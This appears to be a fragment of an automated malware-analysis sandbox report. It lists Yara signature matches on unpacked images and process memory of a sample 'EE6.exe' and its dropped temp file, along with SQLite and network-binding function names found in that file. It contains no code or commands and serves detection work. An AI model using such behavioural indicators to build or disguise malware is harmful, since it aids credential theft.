Source: Yara match File source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1A0D60 sqlite3_bind_parameter_name, 12_2_6D1A0D60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1A0C40 sqlite3_bind_zeroblob, 12_2_6D1A0C40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C8EA0 sqlite3_clear_bindings, 12_2_6D0C8EA0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1A0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 12_2_6D1A0B40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C6410 bind,WSAGetLastError, 12_2_6D0C6410
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0CC030 sqlite3_bind_parameter_count, 12_2_6D0CC030
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0CC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 12_2_6D0CC050
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C6070 PR_Listen, 12_2_6D0C6070
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C60B0 listen,WSAGetLastError, 12_2_6D0C60B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C63C0 PR_Bind, 12_2_6D0C63C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0522D0 sqlite3_bind_blob, 12_2_6D0522D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C9400 sqlite3_bind_int64, 12_2_6D0C9400